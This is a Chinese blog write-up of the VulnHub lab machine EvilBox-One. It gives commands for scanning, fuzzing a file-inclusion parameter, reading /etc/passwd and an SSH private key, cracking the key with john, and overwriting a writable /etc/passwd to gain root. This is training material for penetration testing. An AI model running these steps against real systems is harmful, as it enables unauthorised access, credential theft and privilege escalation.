VulnHub日记(十一):EvilBox-One

最新推荐文章于 2022-11-01 18:57:01 发布
最新推荐文章于 2022-11-01 18:57:01 发布
阅读量1.6k 收藏 1
点赞数 1
分类专栏: VlunHub日记 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44107836/article/details/120527401
版权

靶机介绍

虚拟机链接:EvilBox: One ~ VulnHub

参考博客:EvilBox Writeup - Vulnhub - Walkthrough - Security

开始练习

本机ip:192.168.56.102

虚拟机ip:192.168.56.125

netdiscover查找ip

ediscover -r 192.168.56.0/24

 nmap扫描开放端口及服务

nmap -A 192.168.56.125

 访问80端口并使用dirsearch扫描目录

gobuster dir -r -u http://192.168.56.125/secret -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt -o dir.log

逐个访问,没有发现有用信息,继续递归扫描可以secret文件夹,发现 evil.php文件

 访问依旧没有收获,于是参考博客,使用fuzz枚举GET参数,于是在evil上找到了command参数,可以用于LFI,测试/etc/passwd,成功访问文件

ffuf -c -r -u 'http://192.168.56.125/secret/evil.php?FUZZ=/etc/passwd' -w /usr/share/seclists/Discovery/Web-Content/common.txt -fs 0


192.168.56.125/secret/evil.php?command = /etc/passwd

 发现有mowree用户,尝试其他命令,无效,似乎只能访问文件,在mowree用户目录下有ssh公钥,尝试创建私钥登录ssh

192.168.56.125/secret/evil.php?command=/home/mowree/.ssh/id_rsa

 将私钥复制到本地,更改权限,尝试破解密码

 

cat >id_rsa
chmod 600 id_rsa

我们必须破解密码的hash值。因此,我们需要一个名为 ssh2john.py 的工具来生成hash值

ssh2john.py链接:https://github.com/openwall/john/blob/bleeding-jumbo/run/ssh2john.py

./ssh2john.py id_rsa | tee hash

之后使用john爆破出用户mowree的ssh密码

john hash --wordlist=rockyou.txt

 成功获得密码,接下来使用公钥登录方式登录ssh

ssh 192.168.56.125 -i id_rsa -l mowree

 

 根据提示,再次检查/etc/passwd文件,发现文件可写,使用openssh直接生成root的密码覆盖文件

openssl passwd -1
#输入想设定的密码

将生成的值覆盖之前/etc/passwd中root后的”x"(x的意思是密码保存在/etc/shadow中,修改该值,则可以将密码修改为输入的hash值,这里的截图值和上图中不一样是因为重新生成了其他密码

#先复制/etc/passwwd中内容
cat >/etc/passwd << b
b #输入b直接结束,实现清空
#修改x为生成的hash值,其余不变再写入/etc/passwd
cat >/etc/passwd <<end
#粘贴在这里,输入end结束
end

 

 成功使用修改后的root密码登录,拿到FLAG

su -l root

Dawn_Xiiii
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VnlnHub EvilBox---One
weixin_45682839的博客
09-07 870
VnlnHub EvilBox---One靶场通关攻略记录,涉及知识包括:端口服务探测、铭感目录搜集、参数爆破、任意文件包含漏洞、任意文件读取、ssh私钥爆破、linux本地提权(系统权限漏洞提权)
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhubEvilBox: One
qwweggfe的博客
09-01 1057
文章目录 信息搜集 网页渗透 提权 总结 前言 目前网络安全越来越受到国家的重视,你可以通过本次黑盒的学习,学习到一些关于网络安全的知识,希望对您有所帮助! 提示:以下是本篇文章正文内容,下面案例可供参考 一、信息搜集 首先进行IP扫描 让我们看看看他开启了哪些端口 nmap -sC -sV 192.168.181.157 -p- -v --min-rate=20000 由于80端口打开,于是进行网页访问 于是进行目录扫描 gobuster dir -...
靶机渗透练习64-EvilBox:One
hirak0的博客
04-20 1997
靶机描述 靶机地址:https://www.vulnhub.com/entry/evilbox-one,736/ Description Difficulty: Easy This works better with VirtualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.62 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 该靶机环境搭建
Vulnhub靶机_EVILBOX: ONE
学术渣渣的博客
10-25 522
文章目录靶机信息渗透过程获取靶机IP端口扫描网站目录扫描 靶机信息 下载地址:http://www.vulnhub.com/entry/evilbox-one,736/ 难易程度:简单 渗透过程 获取靶机IP 这个靶机启动后会显示IP地址:192.168.1.103 用主机扫描也可以扫到: arp-scan -l 端口扫描 这里开放了两个端口:22,80。 nmap -A -T4 -p 1-65535 192.168.1.103 网站目录扫描 首先扫描一下特殊文件,这里扫描到一个robots.tx
打靶第六周-EvilBox---One
wcwdnmdnmd的博客
04-09 3250
打靶第六周-EvilBox---One
打靶练习vulnhub: my-cmsms
最新发布
04-10
打靶练习vulnhub: my-cmsms
打靶练习vulnhub:Insanity-Hosting
03-19
打靶练习vulnhub:Insanity-Hosting
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机:EVILBOX_ ONE(很详细)
LainWith的博客
07-08 2884
系列:EvilBox(此系列共1台) 发布日期:2021年08月16日 **难度等级:**低→中 **打靶目标:**取得 root 权限 + 2 Flag 靶机地址:https://www.vulnhub.com/entry/evilbox-one,736/ 涉及攻击方法:netdiscover主机发现 对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。 打开就是一个ubuntu站点,看不出什么东西,下一步自然是目录扫描了。 常规的dirsearch扫描完毕后,发现
vulnhub EvilBox: One
箭雨镜屋
04-25 1469
nmap扫描----gobuster爆破网站目录----ffuf爆破url参数----利用本地文件包含找到用户名和id_rsa----ssh2john+john爆破id_rsa的passphrase----linpeas.sh发现/etc/passwd可写----openssl生成新用户密码hash----将root权限新用户写入/etc/passwd----切换到新用户获得root权限
Vulnhub靶场】EVILBOX: ONE
DG_s1mple
03-24 2427
环境准备 下载靶机后导入到vmware 靶机IP地址为:192.168.2.16 攻击机IP地址为:192.168.2.18 信息收集 使用nmap扫描一下靶机开放的端口信息 只开放了ssh跟http服务 我们访问一下他的网站看看 是最基础的网站,没有什么信息,我们扫描一下 有一个文件夹,我们也去访问一下 是一个空白界面,什么也没有,我们扫描一下这个目录下的文件 有一个php文件,我们也访问一下 也是空的 渗透开始 空的很正常,因为是php代码,所以我们爆破一下是不是有什么参数 发现是文件包
vulnhub靶场——EvilBox-One
Czheisenberg的博客
03-04 4676
vulnhub靶场——EvilBox-One WP
看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 5404
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
EvilBoxvulnhub
wcl20010的博客
05-04 407
EvilBox 目录 EvilBox: One ~ VulnHub 1.主机发现 arp-scan -l namp -Pn 192.168.56.0 2.端口扫描 nmap -p22.80 -sV 192.168.56.105 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) 3.目录扫描 dirsearch
EvilBox-one靶机实验实战演练
lianliandad的博客
11-01 846
好好学习
vulnhub靶机--EvilBox
weixin_46107179的博客
04-13 296
靶机下载地址:靶机下载地址 主机发现 信息搜集 通过nmap扫描,得知开放22,80端口,版本信息以及相关的服务信息 浏览器访问该地址,发现只是一个Apache2默认的页面,然后利用gobuster进行目录和文件扫描,通过-x指定文件类型,得到一个secret的目录和index.html以及robots.txt 访问index.html是刚刚那个Apache2的默认页面,然后访问robots.txt,是一个像似用户名,用hydra爆破ssh并未成功;最后访问secret目录,发现是一个空白页,通过源码
Evilbox-One靶机打靶过程与思路
qq_52610024的博客
04-21 2525
没有有效信息,思考是否可能有写入权限,php//filter/write=convert.base64-decode/resource=test.php&txt=MTIz。-wval.txtVAL-uhttp//10.0.2.26/secret/evil.php?/home/mowree/.ssh/id_rsa。查找suid文件权限find/-perm/40002>/dev/null4000是suid权限位置,后面是将报错文件放置到空白目录中。/etc/passswd。...
EvilBox---One
09-04
你可以从靶场的官网地址https://download.vulnhub.com/evilbox/EvilBox—One.ova下载靶场的镜像文件进行安装。 在靶场中,你可以使用不同的工具和技术来发现漏洞和进行渗透测试。<span class="em">1</span><span ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值